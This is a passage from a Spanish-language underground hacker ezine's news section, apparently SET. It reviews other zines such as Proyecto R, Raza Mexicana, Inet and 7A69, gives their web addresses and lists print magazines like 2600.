ezine que se esta haciendo su propio hueco paso a paso. Cada vez mas asentado y con solidos articulos, Netsearch demuestra que el movimiento de zines under en Espa~a atraviesa momentos de esplendor. Y si no echad la vista atras.... --[ Proyecto R #7 ]-- Parece ayer cuando nos comentaban el nacimiento de Proyecto R, un lector de SET que daba el paso adelante y creaba el que hoy por hoy es ya el mejor ezine chileno, otra muestra mas de las buenas iniciativas que hemos tenido el orgullo de contemplar. Han cambiado de dominio. Nada mejor que http://www.cdlr.org --[ Raza Mexicana #8 ]-- Estos chicos siguen imparables, el numero #8 salio en Octubre si mi memoria no me falla. Siguen con su estilo anarquista total encontra del sistema. Si os interesa leerla esta es su direcion, http://www.raza-mexicana.org --[ Inet #3 ]-- El muy activo Gothstain y el proyecto de Intrusos Exploracion Tecnologica. Siguen en la brecha, impartiendo conocimiento desde Colombia. --[ 7A69 ]-- El impulsor de este zine, Ripe, nos aviso de su existencia. Destinado a la gente que "se pierde leyendo los articulos de SET" ha alcanzado ya el sexto numero. [En confianza, yo NUNCA entendi los articulos de Falken :-DD] Pero ni son todas las que estan ni estan todas las que son. Lease, faltan Ezines. No sigue faltando JJF que parece haberse estancado de momento :? Nosotros no sabemos nada. Que conste que no compramos a la competencia ni cosas por el estilo :-D, la competencia es *buena* y saludable. Que luego sino nos miramos demasiado al ombligo y malo. Como, que tenias que salir aqui?. Pues ya sabes nuestro mail, escribenos que no podemos estar al tanto de todo. Y si no tienes un zine pero crees que tienes algo de interes que contar pues en SET tienes espacio. Cualquier novedad relacionada con el under y que creas debe saberse, la pondremos aqui o en nuestra web. A que esperas?. En papel de verdad, como viene siendo habitual, Linux Actual, Solo Linux, Linux Journal, el 2600 de Oto~o y el nuevo numero de la revista del CCC. Tambien una revista francesa llamada Pirates, que puede ser interesante. *EOF*